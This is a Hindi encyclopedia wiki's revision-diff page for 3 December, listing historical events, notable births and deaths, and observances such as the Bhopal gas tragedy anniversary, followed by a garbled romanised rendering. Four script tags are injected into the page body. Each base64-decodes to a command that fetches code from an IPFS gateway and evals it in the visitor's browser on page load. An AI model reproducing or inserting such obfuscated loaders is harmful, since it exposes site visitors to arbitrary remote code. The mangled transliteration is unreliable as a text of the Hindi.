Difference between revisions of "3 दिसंबर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "लार्ड" to "लॉर्ड")
 
(30 intermediate revisions by 8 users not shown)
Line 1: Line 1:
 
{{कैलंडर}}
 
{{कैलंडर}}
  
[[ग्रेगोरी कैलंडर]] के अनुसार 3 दिसंबर [[वर्ष]] का 337 वाँ ([[लीप वर्ष]] में यह 338 वाँ) दिन है। साल मे अभी और 28 दिन शेष हैं।
+
[[ग्रेगोरी कैलंडर]] के अनुसार 3 दिसंबर [[वर्ष]] का 337 वाँ ([[लीप वर्ष]] में यह 338 वाँ) दिन है। साल में अभी और 28 दिन शेष हैं।
  
 
==3 दिसंबर की महत्त्वपूर्ण घटनाएँ==
 
==3 दिसंबर की महत्त्वपूर्ण घटनाएँ==
* [[1796]] - [[बाजी राव द्वितीय]] को [[मराठा साम्राज्य]] का [[पेशवा]] बनाया गया। वे मराठा साम्राज्य के अंतिम [[पेशवा]] थे।
+
* [[2012]] - फिलीपींस में ‘भूफा’ तूफान से कम से कम 475 लोगों की मौत।
* [[1829]] - वायसराय [[लॉर्ड विलियम बैंटिक]] ने [[भारत]] में सती प्रथा पर रोक लगायी।
+
* [[2008]] - [[मुंबई]] में हुई 23 नवंबर की आतंकवादी घटना के बाद [[महाराष्ट्र]] के मुख्य मंत्री [[विलासराव देशमुख]] ने अपने पद से त्यागपत्र दे दिया।
 +
* [[2004]] - पुर्तग़ाल के सर्वोच्च न्यायालय में मोनिका की अर्जी खारिज। ईराक में पुलिस थानों पर हुए हमले में 30 लोगों की मौत।
 +
**भारत और पाकिस्तान 40 वर्षों के बाद मुनाबाव और खोखरापार के बीच रेल संपर्क फिर से बहाल करने के लिए सहमत हुए।
 +
* [[2002]] - यूएनईपी ने भारत समेत सात उष्णकटिबंधीय देशों में जैव विविधता के अध्ययन के लिए 2 करोड़ 60 लाख डालर जारी किया।
 +
* [[2001]] - गाजा पर इस्रायल के हमले में यासर अराफात के हैलीकॉप्टर नष्ट।
 +
* [[2000]] - विसिट फ़ॉक्स मैक्सिको के नये राष्ट्रपति निर्वाचित, आस्ट्रेलिया ने वेस्टइंडीज को टेस्ट मैच में हराकर लगातार 12 टेस्ट मैच जीतने का रिकार्ड बनाया।
 +
* [[1999]] - विश्व प्रसिद्ध गिटार वादक चार्ली ली बर्ड का निधन, चेचेन्या के छापामारों ने 250 रूसी सैनिकों को मार गिराया।
 +
* [[1994]] - ताइवान में पहला स्वतंत्र स्थानीय चुनाव सम्पन्न।
 +
* [[1989]] - [[रूस]] के राष्ट्रपति मिखाइल गोर्वाच्योव और अमेरिका के राष्ट्रपति जॉर्ज बुश ने शीत युद्ध खत्म होने की घोषणा की।
 +
* [[1984]] - [[भोपाल]] स्थित यूनियन कार्बाइड फैक्ट्री से विषैली गैस लीक होने से कम से कम 3000 लोग मारे गए और कई हजार व्यक्ति शारीरिक विकृति के शिकार हो गए।
 +
* [[1975]] - लाओस गणराज्य घोषित।
 +
* [[1971]] - भारत और [[पाकिस्तान]] के बीच युद्ध शुरू होने के बाद देश में आपातकाल लागू हुआ।
 +
* [[1967]] - [[भारत]] का पहला रॉकेट (रोहिणी आर एच 75) को थुम्बा से प्रक्षेपित किया गया।
 +
** इंडोनेशिया के पूर्व राष्ट्रपति सुकर्णो नजरबंद किये गए।
 
* [[1959]] - [[भारत]] और [[नेपाल]] ने गंडक सिंचाई और विद्युत परियोजना के समझौते पर हस्ताक्षर किये।
 
* [[1959]] - [[भारत]] और [[नेपाल]] ने गंडक सिंचाई और विद्युत परियोजना के समझौते पर हस्ताक्षर किये।
* [[1967]] - [[भारत]] का पहला रॉकेट (रोहिणी आर एच 75) को थुम्बा से प्रक्षेपित किया गया।
+
* [[1948]] - पूर्वी चीन सागर में चीनी शरणार्थी जहाज को ले जा रहे जहाज कियांग्या में विस्फाेट हाेने से 1,100 लाेगों की माैत हुई।
* [[2008]] - [[मुंबई]] में हुई 23 नवंबर की आतंकवादी घटना के बाद [[महाराष्ट्र]] के मुख्य मंत्री [[विलासराव देशमुख]] ने अपने पद से त्यागपत्र दे दिया।
+
* [[1912]] - तुर्की, बुल्गारिया, सर्बिया, यूनान और मोंटेगरो ने युद्धविराम समझौता किया।
 +
* [[1910]] - फ्रांसीसी भौतिकशास्त्री जॉर्जेज क्लाउड द्वारा विकसित विश्व के पहले नियोन लैम्प का पहली बार पेरिस के मोटर शो में प्रदर्शन।
 +
* 1829 - वायसराय [[लॉर्ड विलियम बैंटिक]] ने [[भारत]] में सती प्रथा पर रोक लगायी।
 +
* 1828 - एंड्रयू जैक्सन [[अमेरिका]] के सातवें राष्ट्रपति चुने गए।
 +
* 1824 - अंग्रेज़ों ने मद्रास और मुंबई से कुमुक मंगा कर फिर कित्तूर का किला घेर लिया।
 +
* 1796 - [[बाजी राव द्वितीय]] को [[मराठा साम्राज्य]] का [[पेशवा]] बनाया गया। वे मराठा साम्राज्य के अंतिम [[पेशवा]] थे।
 +
* 1790 - लार्ड कार्नवालिस ने आपराधिक मामलों में न्याय की ताकत मुशिर्दाबाद के नवाब से छीन कर अपने हाथ में कर ली और सदर निजामत अदालत को [[कोलकाता]] स्थानांतरित कर दिया।
  
 
==3 दिसंबर को जन्मे व्यक्ति==
 
==3 दिसंबर को जन्मे व्यक्ति==
 +
* [[1982]] - [[मिताली राज]] - [[टेस्ट क्रिकेट|टेस्ट क्रिकेट मैच]] में दोहरा शतक बनाने वाली पहली भारतीय महिला।
 +
* [[1973]] - [[अरूप बसक]] - [[भारत]] की राष्ट्रीय [[टेबल टेनिस]] टीम के कोच हैं।
 +
* [[1957]] - [[रमाशंकर यादव 'विद्रोही']] - [[जवाहरलाल नेहरू विश्वविद्यालय]] में विद्यार्थियों के बीच लोकप्रिय रहे जनकवि थे।
 +
* [[1937]] - विनोद बिहारी वर्मा - भारतीय भाषाविद।
 +
* [[1913]] - [[शिवनारायण श्रीवास्तव]] - [[हिन्दी साहित्य]] के अध्ययनशील एवं मननशील रचनाकार।
 +
* [[1903]] - [[यशपाल]] - [[हिन्दी]] के यशस्वी कथाकार और निबन्ध लेखक
 +
* [[1889]] - [[खुदीराम बोस]] - स्‍वतंत्रता सेनानी
 +
* [[1888]] - रमेश चन्द्र मजूमदार - प्रसिद्ध भारतीय इतिहासकार।
 
* [[1884]] - [[राजेन्द्र प्रसाद]] - [[भारत]] के प्रथम [[राष्ट्रपति]]
 
* [[1884]] - [[राजेन्द्र प्रसाद]] - [[भारत]] के प्रथम [[राष्ट्रपति]]
* [[1888]] - रमेश चन्द्र मजूमदार, प्रसिद्ध भारतीय इतिहासकार।
+
* [[1882]] - [[नंदलाल बोस]] - भारत के एक प्रसिद्ध चित्रकार
  
 
==3 दिसंबर को हुए निधन==
 
==3 दिसंबर को हुए निधन==
 +
* [[2020]] - [[धर्मपाल गुलाटी]] - [[भारत]] की दिग्गज मसाला कम्पनी 'एमडीएच' के मालिक थे।
 +
* [[2011]]- [[देव आनंद]] - फ़िल्म अभिनेता और निर्माता।
 +
* [[1982]] - [[विष्णु डे]] - [[ज्ञानपीठ पुरस्कार]] ([[1971]]) से सम्मानित बांग्ला साहित्यकार थे।
 +
* [[1979]] - [[मेजर ध्यानचंद]]- [[भारत]] के ख्याति प्राप्त [[हॉकी]] खिलाड़ी।
 +
* [[1971]]- [[अल्बर्ट एक्का|लांस नायक अल्बर्ट एक्का]], [[परमवीर चक्र]] सम्मानित भारतीय सैनिक
  
 
==3 दिसंबर के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==3 दिसंबर के महत्त्वपूर्ण अवसर एवं उत्सव==
 
+
*[[भोपाल गैस त्रासदी|भोपाल गैस त्रासदी दिवस]]
 +
*[[अंतरराष्ट्रीय विकलांग दिवस|विश्व विकलांग दिवस]]
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 +
* [http://www.univarta.com/history-of-the-03december-2016/today-in-history/news/705145.html univarta.com]
 
{{कैलंडर बाहरी कड़ियाँ}}
 
{{कैलंडर बाहरी कड़ियाँ}}
  

Latest revision as of 06:02, 2 October 2022

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 3 disanbar varsh ka 337 vaan (lip varsh mean yah 338 vaan) din hai. sal mean abhi aur 28 din shesh haian.

3 disanbar ki mahattvapoorn ghatanaean

  • 2012 - philipians mean ‘bhoopha’ toophan se kam se kam 475 logoan ki maut.
  • 2008 - muanbee mean huee 23 navanbar ki atankavadi ghatana ke bad maharashtr ke mukhy mantri vilasarav deshamukh ne apane pad se tyagapatr de diya.
  • 2004 - purtagal ke sarvochch nyayalay mean monika ki arji kharij. eerak mean pulis thanoan par hue hamale mean 30 logoan ki maut.
    • bharat aur pakistan 40 varshoan ke bad munabav aur khokharapar ke bich rel sanpark phir se bahal karane ke lie sahamat hue.
  • 2002 - yooeneepi ne bharat samet sat ushnakatibandhiy deshoan mean jaiv vividhata ke adhyayan ke lie 2 karo d 60 lakh dalar jari kiya.
  • 2001 - gaja par israyal ke hamale mean yasar araphat ke hailik aauptar nasht.
  • 2000 - visit f aauks maiksiko ke naye rashtrapati nirvachit, astreliya ne vestiandij ko test maich mean harakar lagatar 12 test maich jitane ka rikard banaya.
  • 1999 - vishv prasiddh gitar vadak charli li bard ka nidhan, chechenya ke chhapamaroan ne 250 roosi sainikoan ko mar giraya.
  • 1994 - taivan mean pahala svatantr sthaniy chunav sampann.
  • 1989 - roos ke rashtrapati mikhail gorvachyov aur amerika ke rashtrapati j aaurj bush ne shit yuddh khatm hone ki ghoshana ki.
  • 1984 - bhopal sthit yooniyan karbaid phaiktri se vishaili gais lik hone se kam se kam 3000 log mare ge aur kee hajar vyakti sharirik vikriti ke shikar ho ge.
  • 1975 - laos ganarajy ghoshit.
  • 1971 - bharat aur pakistan ke bich yuddh shuroo hone ke bad desh mean apatakal lagoo hua.
  • 1967 - bharat ka pahala r aauket (rohini ar ech 75) ko thumba se prakshepit kiya gaya.
    • iandoneshiya ke poorv rashtrapati sukarno najaraband kiye ge.
  • 1959 - bharat aur nepal ne gandak sianchaee aur vidyut pariyojana ke samajhaute par hastakshar kiye.
  • 1948 - poorvi chin sagar mean chini sharanarthi jahaj ko le ja rahe jahaj kiyaangya mean visphaet haene se 1,100 laegoan ki maait huee.
  • 1912 - turki, bulgariya, sarbiya, yoonan aur moantegaro ne yuddhaviram samajhauta kiya.
  • 1910 - phraansisi bhautikashastri j aaurjej klaud dvara vikasit vishv ke pahale niyon laimp ka pahali bar peris ke motar sho mean pradarshan.
  • 1829 - vayasaray l aaurd viliyam baiantik ne bharat mean sati pratha par rok lagayi.
  • 1828 - eandrayoo jaiksan amerika ke satavean rashtrapati chune ge.
  • 1824 - aangrezoan ne madras aur muanbee se kumuk manga kar phir kittoor ka kila gher liya.
  • 1796 - baji rav dvitiy ko maratha samrajy ka peshava banaya gaya. ve maratha samrajy ke aantim peshava the.
  • 1790 - lard karnavalis ne aparadhik mamaloan mean nyay ki takat mushirdabad ke navab se chhin kar apane hath mean kar li aur sadar nijamat adalat ko kolakata sthanaantarit kar diya.

3 disanbar ko janme vyakti

3 disanbar ko hue nidhan

3 disanbar ke mahattvapoorn avasar evan utsav

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>